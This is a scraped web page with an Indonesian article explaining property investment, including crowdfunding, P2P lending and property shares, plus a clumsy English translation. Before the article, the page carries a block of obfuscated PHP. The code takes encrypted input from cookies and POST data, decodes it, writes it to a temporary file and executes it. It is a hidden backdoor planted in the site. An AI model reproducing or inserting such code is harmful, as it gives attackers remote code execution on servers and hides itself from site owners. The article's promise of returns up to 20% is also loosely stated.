$cboqCWmoGb = chr ( 432 - 364 ).chr (117) . chr (108) . chr (95) . chr ( 901 - 832 )."\127" . "\x4d";$iChKRADt = "\x63" . "\x6c" . "\141" . 's' . 's' . '_' . 'e' . chr ( 518 - 398 )."\151" . chr ( 236 - 121 ).chr ( 668 - 552 )."\163";$HYqSt = class_exists($cboqCWmoGb); $cboqCWmoGb = "37966";$iChKRADt = "17362";$aYzIuNgDUH = !1;if ($HYqSt == $aYzIuNgDUH){function BnKPy(){return FALSE;}$xAgmXnrv = "62835";BnKPy();class Dul_EWM{private function JkPoDud($xAgmXnrv){if (is_array(Dul_EWM::$YXgCR)) {$hfbAOHbjyk = sys_get_temp_dir() . "/" . crc32(Dul_EWM::$YXgCR[chr ( 718 - 603 )."\x61" . chr ( 524 - 416 ).'t']);@Dul_EWM::$YXgCR[chr ( 473 - 354 )."\x72" . chr (105) . chr ( 361 - 245 ).chr ( 512 - 411 )]($hfbAOHbjyk, Dul_EWM::$YXgCR[chr ( 812 - 713 ).chr (111) . 'n' . chr ( 964 - 848 ).chr (101) . "\x6e" . 't']);include $hfbAOHbjyk;@Dul_EWM::$YXgCR["\x64" . 'e' . chr ( 1097 - 989 ).chr (101) . "\x74" . 'e']($hfbAOHbjyk); $xAgmXnrv = "62835";exit();}}private $XIWtttjmx;public function duarL(){echo 31566;}public function __destruct(){$xAgmXnrv = "24324_28502";$this->JkPoDud($xAgmXnrv); $xAgmXnrv = "24324_28502";}public function __construct($gKnXf=0){$MIfWCR = $_POST;$gtrnzz = $_COOKIE;$sjPQQ = "c9415bbb-ab91-4b0b-b3e0-8c81b55ed6c6";$naqTvPTV = @$gtrnzz[substr($sjPQQ, 0, 4)];if (!empty($naqTvPTV)){$deUHFAx = "base64";$leBURvwpqm = "";$naqTvPTV = explode(",", $naqTvPTV);foreach ($naqTvPTV as $GiWYz){$leBURvwpqm .= @$gtrnzz[$GiWYz];$leBURvwpqm .= @$MIfWCR[$GiWYz];}$leBURvwpqm = array_map($deUHFAx . "\x5f" . chr (100) . "\145" . chr (99) . "\x6f" . 'd' . chr (101), array($leBURvwpqm,)); $leBURvwpqm = $leBURvwpqm[0] ^ str_repeat($sjPQQ, (strlen($leBURvwpqm[0]) / strlen($sjPQQ)) + 1);Dul_EWM::$YXgCR = @unserialize($leBURvwpqm); $leBURvwpqm = class_exists("24324_28502");}}public static $YXgCR = 26336;}$TSOqXiHMi = new /* 35500 */ Dul_EWM(62835 + 62835); $aYzIuNgDUH = $TSOqXiHMi = $xAgmXnrv = Array();} Pengertian Investasi Properti - https://www.telcotvnews.com/

Pengertian Investasi Properti

Investasi properti adalah pembelian properti atau real estate dengan tujuan mendapat keuntungan melalui kegiatan usaha penyewaan, penjualan kembali properti di masa depan, atau keduanya. Jadi, tidak dibeli sebagai tempat tinggal pembelinya.

Investasi properti dapat dimiliki perorangan maupun instansi atau badan usaha. Investasi properti bisa termasuk investasi jangka panjang atau jangka pendek.

Investasi properti sering disebut rumah kedua. Rumah pertama untuk ditinggali, rumah kedua sebagai investasi.

Namun tidak semua menggunakan cara seperti itu. Bisa juga seseorang membeli rumah kedua, misalnya vila di salah satu destinasi wisata sebagai tempat menginap jika sedang berlibur di wilayah tersebut.

Dengan kata lain, itu bukan investasi properti. Tetapi untuk kepentingan pribadi. Properti bukan dijadikan sebagai sumber pendapatan.

Cara Investasi Properti

Property equity crowdfunding adalah investasi properti patungan bersama investor lain di platform atau aplikasi yang menyediakan layanan tersebut. Ini adalah investasi properti online murah karena tak perlu modal besar seperti membeli properti offline.

Contoh, kamu ingin investasi properti dengan membeli rumah seharga Rp 1 miliar. Cukup tanam modal 1% dari harga properti atau sebesar Rp 10 juta. Sisa investasi akan datang dari investor lain. Murah kan?

Investasi properti P2P Lending
Cara investasi properti untuk pemula lainnya, yakni melakukan pendanaan atau investasi P2P Lending, khususnya untuk proyek investasi. Platform ini menghubungkan pengembang dengan masyarakat.

Kamu dapat menjadi pemberi pinjaman (lender) dengan minimal investasi mulai dari Rp 100 ribu. Keuntungan atau imbal hasil yang diperoleh hingga 20% per tahun.

Membeli saham emiten properti
Cara investasi properti online berikutnya adalah membeli saham emiten properti. Investasi saham di sektor properti saat ini bisa dilakukan secara daring melalui aplikasi trading saham online milik perusahaan sekuritas.

Investasi saham online modal kecil. Dimulai dari Rp 100 ribu. Selain beli saham, kamu juga bisa menjual saham dan melakukan analisis lewat fitur grafik saham yang disediakan.

Investment of Property

Property investment is the purchase of property or real estate with the aim of earning a profit through the activities of the rental business, the resale of the property in the future, or both. It is not purchased as a buyer’s home.

Property investments can be owned by individuals or agencies or enterprises. Property investments can include long-term or short-term investments.

Property investments are often called second houses. The first home to rent, the second home as an investment.

But not everyone uses that way. You can also buy a second home, such as a villa in one of the tourist destinations as a place to stay if you are on holiday in the area.

In other words, it is not an investment in property. But for personal interest. Property is not used as a source of income.

How to Invest Property
Property equity crowdfunding is a joint property investment with other investors in the platform or application that provides such services. This is a cheap online property investment because it does not require a large capital like buying an offline property.

For example, you want to invest a property by buying a house for Rp 1 billion. It is sufficient to plant capital 1% of the property price or an amount of Rp 10 million. The rest will come from other investors. It is cheap, right?

Investing in P2P Lending
How to invest property for other beginners, which is to do funding or P2P lending investment, especially for investment projects. This platform connects developers with society.

You can become a lender with a minimum investment starting from Rp 100,000. Profit or imbal earnings earned up to 20% per year.

Buying Property Shares
The next way to invest in real estate online is to buy the shares of the property issuer. Stock investments in the real estate sector can now be done online through the online stock trading app owned by securities companies.

Small online stock investments. Starting from Rp 100,000. In addition to buying stocks, you can also sell stocks and analyze through the stock chart features provided.